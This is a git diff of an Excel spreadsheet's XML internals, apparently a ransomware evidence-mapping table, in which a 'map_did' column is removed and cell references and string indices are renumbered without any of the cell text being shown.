--- a/delta2/lib_e/osi_ransom/tag_none.xlsx
+++ b/delta2/lib_e/osi_ransom/tag_none.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10402"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10413"/>
   <workbookPr defaultThemeVersion="202300"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{10F66C4B-F186-434B-BE19-952AD5304A5A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{44D38BA2-6089-AA42-BD5C-A27467DEC2F8}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="38400" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="116" uniqueCount="64">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="115" uniqueCount="63">
   <si>
     <t>eid</t>
   </si>
@@ -45,9 +45,6 @@
   </si>
   <si>
     <t>description</t>
-  </si>
-  <si>
-    <t>map_did</t>
   </si>
   <si>
     <t>evidence</t>
@@ -293,13 +290,7 @@
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="15">
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
+  <dxfs count="13">
     <dxf>
       <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
@@ -353,15 +344,14 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G28" totalsRowShown="0" dataDxfId="14">
-  <autoFilter ref="A1:G28" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:G28">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F28" totalsRowShown="0" dataDxfId="12">
+  <autoFilter ref="A1:F28" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F28">
     <sortCondition ref="A1:A28"/>
   </sortState>
-  <tableColumns count="7">
-    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="13" totalsRowDxfId="12"/>
-    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="11" totalsRowDxfId="10"/>
-    <tableColumn id="3" xr3:uid="{F8B6E0DD-D4FA-1C43-B56F-C68835F236FD}" name="map_did" dataDxfId="9" totalsRowDxfId="8"/>
+  <tableColumns count="6">
+    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="11" totalsRowDxfId="10"/>
+    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="9" totalsRowDxfId="8"/>
     <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="7" totalsRowDxfId="6"/>
     <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="5" totalsRowDxfId="4"/>
     <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="3" totalsRowDxfId="2"/>
@@ -688,25 +678,24 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G28"/>
+  <dimension ref="A1:F28"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A8" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="D27" sqref="D27"/>
+      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft" activeCell="C1" sqref="C1:C1048576"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="20.1640625" customWidth="1"/>
     <col min="2" max="2" width="17.5" customWidth="1"/>
-    <col min="3" max="3" width="17" customWidth="1"/>
-    <col min="4" max="4" width="16.1640625" customWidth="1"/>
-    <col min="5" max="5" width="107.6640625" customWidth="1"/>
-    <col min="6" max="6" width="53.6640625" customWidth="1"/>
-    <col min="7" max="7" width="132.83203125" customWidth="1"/>
+    <col min="3" max="3" width="16.1640625" customWidth="1"/>
+    <col min="4" max="4" width="107.6640625" customWidth="1"/>
+    <col min="5" max="5" width="53.6640625" customWidth="1"/>
+    <col min="6" max="6" width="132.83203125" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:7" x14ac:dyDescent="0.2">
+    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
       <c r="A1" t="s">
         <v>0</v>
       </c>
@@ -714,480 +703,450 @@
         <v>1</v>
       </c>
       <c r="C1" t="s">
+        <v>5</v>
+      </c>
+      <c r="D1" t="s">
         <v>3</v>
       </c>
-      <c r="D1" t="s">
+      <c r="E1" t="s">
+        <v>2</v>
+      </c>
+      <c r="F1" t="s">
+        <v>4</v>
+      </c>
+    </row>
+    <row r="2" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A2" s="1" t="s">
+        <v>34</v>
+      </c>
+      <c r="B2" s="1"/>
+      <c r="C2" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D2" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E2" s="1"/>
+      <c r="F2" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A3" s="1" t="s">
+        <v>35</v>
+      </c>
+      <c r="B3" s="1"/>
+      <c r="C3" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D3" s="1" t="s">
+        <v>9</v>
+      </c>
+      <c r="E3" s="1"/>
+      <c r="F3" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A4" s="1" t="s">
+        <v>36</v>
+      </c>
+      <c r="B4" s="1"/>
+      <c r="C4" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D4" s="1" t="s">
+        <v>10</v>
+      </c>
+      <c r="E4" s="1"/>
+      <c r="F4" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A5" s="1" t="s">
+        <v>37</v>
+      </c>
+      <c r="B5" s="1"/>
+      <c r="C5" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D5" s="1" t="s">
+        <v>11</v>
+      </c>
+      <c r="E5" s="1"/>
+      <c r="F5" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A6" s="1" t="s">
+        <v>38</v>
+      </c>
+      <c r="B6" s="1"/>
+      <c r="C6" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D6" s="1" t="s">
+        <v>12</v>
+      </c>
+      <c r="E6" s="1"/>
+      <c r="F6" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A7" s="1" t="s">
+        <v>39</v>
+      </c>
+      <c r="B7" s="1"/>
+      <c r="C7" s="1" t="s">
+        <v>62</v>
+      </c>
+      <c r="D7" s="1" t="s">
+        <v>13</v>
+      </c>
+      <c r="E7" s="1"/>
+      <c r="F7" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A8" s="1" t="s">
+        <v>40</v>
+      </c>
+      <c r="B8" s="1"/>
+      <c r="C8" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D8" s="1" t="s">
+        <v>14</v>
+      </c>
+      <c r="E8" s="1"/>
+      <c r="F8" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A9" s="1" t="s">
+        <v>41</v>
+      </c>
+      <c r="B9" s="1"/>
+      <c r="C9" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D9" s="1" t="s">
+        <v>15</v>
+      </c>
+      <c r="E9" s="1"/>
+      <c r="F9" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A10" s="1" t="s">
+        <v>42</v>
+      </c>
+      <c r="B10" s="1"/>
+      <c r="C10" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D10" s="1" t="s">
+        <v>16</v>
+      </c>
+      <c r="E10" s="1"/>
+      <c r="F10" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A11" s="1" t="s">
+        <v>43</v>
+      </c>
+      <c r="B11" s="1"/>
+      <c r="C11" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D11" s="1" t="s">
+        <v>17</v>
+      </c>
+      <c r="E11" s="1"/>
+      <c r="F11" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A12" s="1" t="s">
+        <v>44</v>
+      </c>
+      <c r="B12" s="1"/>
+      <c r="C12" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D12" s="1" t="s">
+        <v>18</v>
+      </c>
+      <c r="E12" s="1"/>
+      <c r="F12" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A13" s="1" t="s">
+        <v>45</v>
+      </c>
+      <c r="B13" s="1"/>
+      <c r="C13" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D13" s="1" t="s">
+        <v>19</v>
+      </c>
+      <c r="E13" s="1"/>
+      <c r="F13" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A14" s="1" t="s">
+        <v>46</v>
+      </c>
+      <c r="B14" s="1"/>
+      <c r="C14" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D14" s="1" t="s">
+        <v>20</v>
+      </c>
+      <c r="E14" s="1"/>
+      <c r="F14" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A15" s="1" t="s">
+        <v>47</v>
+      </c>
+      <c r="B15" s="1"/>
+      <c r="C15" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D15" s="1" t="s">
+        <v>21</v>
+      </c>
+      <c r="E15" s="1"/>
+      <c r="F15" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="16" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A16" s="1" t="s">
+        <v>48</v>
+      </c>
+      <c r="B16" s="1"/>
+      <c r="C16" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D16" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="E16" s="1"/>
+      <c r="F16" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="17" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A17" s="1" t="s">
+        <v>49</v>
+      </c>
+      <c r="B17" s="1"/>
+      <c r="C17" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D17" s="1" t="s">
+        <v>23</v>
+      </c>
+      <c r="E17" s="1"/>
+      <c r="F17" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="18" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A18" s="1" t="s">
+        <v>50</v>
+      </c>
+      <c r="B18" s="1"/>
+      <c r="C18" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D18" s="1" t="s">
+        <v>24</v>
+      </c>
+      <c r="E18" s="1"/>
+      <c r="F18" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="19" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A19" s="1" t="s">
+        <v>51</v>
+      </c>
+      <c r="B19" s="1"/>
+      <c r="C19" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D19" s="1" t="s">
+        <v>25</v>
+      </c>
+      <c r="E19" s="1"/>
+      <c r="F19" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="20" spans="1:6" ht="17" x14ac:dyDescent="0.2">
+      <c r="A20" s="1" t="s">
+        <v>52</v>
+      </c>
+      <c r="B20" s="1"/>
+      <c r="C20" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D20" s="1" t="s">
+        <v>26</v>
+      </c>
+      <c r="E20" s="1"/>
+      <c r="F20" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="21" spans="1:6" ht="68" x14ac:dyDescent="0.2">
+      <c r="A21" s="1" t="s">
+        <v>53</v>
+      </c>
+      <c r="B21" s="1"/>
+      <c r="C21" s="1" t="s">
         <v>6</v>
       </c>
-      <c r="E1" t="s">
-        <v>4</v>
-      </c>
-      <c r="F1" t="s">
-        <v>2</v>
-      </c>
-      <c r="G1" t="s">
-        <v>5</v>
-      </c>
-    </row>
-    <row r="2" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A2" s="1" t="s">
-        <v>35</v>
-      </c>
-      <c r="B2" s="1"/>
-      <c r="C2" s="1"/>
-      <c r="D2" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E2" s="1" t="s">
-        <v>8</v>
-      </c>
-      <c r="F2" s="1"/>
-      <c r="G2" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="3" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A3" s="1" t="s">
-        <v>36</v>
-      </c>
-      <c r="B3" s="1"/>
-      <c r="C3" s="1"/>
-      <c r="D3" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E3" s="1" t="s">
-        <v>10</v>
-      </c>
-      <c r="F3" s="1"/>
-      <c r="G3" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="4" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A4" s="1" t="s">
-        <v>37</v>
-      </c>
-      <c r="B4" s="1"/>
-      <c r="C4" s="1"/>
-      <c r="D4" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E4" s="1" t="s">
-        <v>11</v>
-      </c>
-      <c r="F4" s="1"/>
-      <c r="G4" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="5" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A5" s="1" t="s">
-        <v>38</v>
-      </c>
-      <c r="B5" s="1"/>
-      <c r="C5" s="1"/>
-      <c r="D5" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E5" s="1" t="s">
-        <v>12</v>
-      </c>
-      <c r="F5" s="1"/>
-      <c r="G5" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="6" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A6" s="1" t="s">
-        <v>39</v>
-      </c>
-      <c r="B6" s="1"/>
-      <c r="C6" s="1"/>
-      <c r="D6" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E6" s="1" t="s">
-        <v>13</v>
-      </c>
-      <c r="F6" s="1"/>
-      <c r="G6" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="7" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A7" s="1" t="s">
-        <v>40</v>
-      </c>
-      <c r="B7" s="1"/>
-      <c r="C7" s="1"/>
-      <c r="D7" s="1" t="s">
-        <v>63</v>
-      </c>
-      <c r="E7" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="F7" s="1"/>
-      <c r="G7" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="8" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A8" s="1" t="s">
-        <v>41</v>
-      </c>
-      <c r="B8" s="1"/>
-      <c r="C8" s="1"/>
-      <c r="D8" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E8" s="1" t="s">
-        <v>15</v>
-      </c>
-      <c r="F8" s="1"/>
-      <c r="G8" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="9" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A9" s="1" t="s">
-        <v>42</v>
-      </c>
-      <c r="B9" s="1"/>
-      <c r="C9" s="1"/>
-      <c r="D9" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E9" s="1" t="s">
-        <v>16</v>
-      </c>
-      <c r="F9" s="1"/>
-      <c r="G9" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="10" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A10" s="1" t="s">
-        <v>43</v>
-      </c>
-      <c r="B10" s="1"/>
-      <c r="C10" s="1"/>
-      <c r="D10" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E10" s="1" t="s">
-        <v>17</v>
-      </c>
-      <c r="F10" s="1"/>
-      <c r="G10" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A11" s="1" t="s">
-        <v>44</v>
-      </c>
-      <c r="B11" s="1"/>
-      <c r="C11" s="1"/>
-      <c r="D11" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E11" s="1" t="s">
-        <v>18</v>
-      </c>
-      <c r="F11" s="1"/>
-      <c r="G11" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A12" s="1" t="s">
-        <v>45</v>
-      </c>
-      <c r="B12" s="1"/>
-      <c r="C12" s="1"/>
-      <c r="D12" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E12" s="1" t="s">
-        <v>19</v>
-      </c>
-      <c r="F12" s="1"/>
-      <c r="G12" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="13" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A13" s="1" t="s">
-        <v>46</v>
-      </c>
-      <c r="B13" s="1"/>
-      <c r="C13" s="1"/>
-      <c r="D13" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E13" s="1" t="s">
-        <v>20</v>
-      </c>
-      <c r="F13" s="1"/>
-      <c r="G13" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="14" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A14" s="1" t="s">
-        <v>47</v>
-      </c>
-      <c r="B14" s="1"/>
-      <c r="C14" s="1"/>
-      <c r="D14" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E14" s="1" t="s">
-        <v>21</v>
-      </c>
-      <c r="F14" s="1"/>
-      <c r="G14" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A15" s="1" t="s">
-        <v>48</v>
-      </c>
-      <c r="B15" s="1"/>
-      <c r="C15" s="1"/>
-      <c r="D15" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E15" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="F15" s="1"/>
-      <c r="G15" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="16" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A16" s="1" t="s">
-        <v>49</v>
-      </c>
-      <c r="B16" s="1"/>
-      <c r="C16" s="1"/>
-      <c r="D16" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E16" s="1" t="s">
-        <v>23</v>
-      </c>
-      <c r="F16" s="1"/>
-      <c r="G16" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="17" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A17" s="1" t="s">
-        <v>50</v>
-      </c>
-      <c r="B17" s="1"/>
-      <c r="C17" s="1"/>
-      <c r="D17" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E17" s="1" t="s">
-        <v>24</v>
-      </c>
-      <c r="F17" s="1"/>
-      <c r="G17" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="18" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A18" s="1" t="s">
-        <v>51</v>
-      </c>
-      <c r="B18" s="1"/>
-      <c r="C18" s="1"/>
-      <c r="D18" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E18" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="F18" s="1"/>
-      <c r="G18" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="19" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A19" s="1" t="s">
-        <v>52</v>
-      </c>
-      <c r="B19" s="1"/>
-      <c r="C19" s="1"/>
-      <c r="D19" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E19" s="1" t="s">
-        <v>26</v>
-      </c>
-      <c r="F19" s="1"/>
-      <c r="G19" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="20" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A20" s="1" t="s">
-        <v>53</v>
-      </c>
-      <c r="B20" s="1"/>
-      <c r="C20" s="1"/>
-      <c r="D20" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E20" s="1" t="s">
+      <c r="D21" s="1" t="s">
         <v>27</v>
-      </c>
-      <c r="F20" s="1"/>
-      <c r="G20" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="21" spans="1:7" ht="68" x14ac:dyDescent="0.2">
-      <c r="A21" s="1" t="s">
-        <v>54</v>
-      </c>
-      <c r="B21" s="1"/>
-      <c r="C21" s="1"/>
-      <c r="D21" s="1" t="s">
-        <v>7</v>
       </c>
       <c r="E21" s="1" t="s">
         <v>28</v>
       </c>
       <c r="F21" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="22" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A22" s="1" t="s">
+        <v>54</v>
+      </c>
+      <c r="B22" s="1"/>
+      <c r="C22" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D22" s="1" t="s">
         <v>29</v>
       </c>
-      <c r="G21" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="22" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A22" s="1" t="s">
+      <c r="E22" s="1"/>
+      <c r="F22" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="23" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A23" s="1" t="s">
         <v>55</v>
       </c>
-      <c r="B22" s="1"/>
-      <c r="C22" s="1"/>
-      <c r="D22" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E22" s="1" t="s">
+      <c r="B23" s="1"/>
+      <c r="C23" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D23" s="1" t="s">
         <v>30</v>
       </c>
-      <c r="F22" s="1"/>
-      <c r="G22" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="23" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A23" s="1" t="s">
+      <c r="E23" s="1"/>
+      <c r="F23" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A24" s="1" t="s">
         <v>56</v>
       </c>
-      <c r="B23" s="1"/>
-      <c r="C23" s="1"/>
-      <c r="D23" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E23" s="1" t="s">
+      <c r="B24" s="1"/>
+      <c r="C24" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D24" s="1" t="s">
+        <v>30</v>
+      </c>
+      <c r="E24" s="1"/>
+      <c r="F24" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="25" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A25" s="1" t="s">
+        <v>57</v>
+      </c>
+      <c r="B25" s="1"/>
+      <c r="C25" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D25" s="1" t="s">
+        <v>30</v>
+      </c>
+      <c r="E25" s="1"/>
+      <c r="F25" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="26" spans="1:6" ht="85" x14ac:dyDescent="0.2">
+      <c r="A26" s="1" t="s">
+        <v>58</v>
+      </c>
+      <c r="B26" s="1"/>
+      <c r="C26" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D26" s="1" t="s">
         <v>31</v>
       </c>
-      <c r="F23" s="1"/>
-      <c r="G23" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="24" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A24" s="1" t="s">
-        <v>57</v>
-      </c>
-      <c r="B24" s="1"/>
-      <c r="C24" s="1"/>
-      <c r="D24" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E24" s="1" t="s">
-        <v>31</v>
-      </c>
-      <c r="F24" s="1"/>
-      <c r="G24" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="25" spans="1:7" ht="34" x14ac:dyDescent="0.2">
-      <c r="A25" s="1" t="s">
-        <v>58</v>
-      </c>
-      <c r="B25" s="1"/>
-      <c r="C25" s="1"/>
-      <c r="D25" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E25" s="1" t="s">
-        <v>31</v>
-      </c>
-      <c r="F25" s="1"/>
-      <c r="G25" s="1" t="s">
